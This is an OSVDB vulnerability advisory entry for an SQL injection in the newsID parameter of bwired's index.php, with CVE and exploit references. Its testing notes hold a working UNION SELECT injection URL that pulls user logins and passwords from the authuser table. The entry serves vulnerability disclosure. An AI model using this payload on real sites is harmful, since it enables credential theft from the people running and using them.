bwired index.php newsID Variable SQL Injection

2007-07-22T00:00:00
ID OSVDB:39135
Type osvdb
Reporter OSVDB
Modified 2007-07-22T00:00:00

Description

Manual Testing Notes

http://[target]/[pathtobwired]/index.php?newsID=-99%20union%20all%20select1,2,concat(user_login,0x20,0x3a,0x20,user_passwd),4,5,6, 7, 8, 9, 10, 11%20from%20authuser

References:

ISS X-Force ID: 35540
Generic Exploit URL: http://www.milw0rm.com/exploits/4213
FrSIRT Advisory: ADV-2007-2612
CVE-2007-3976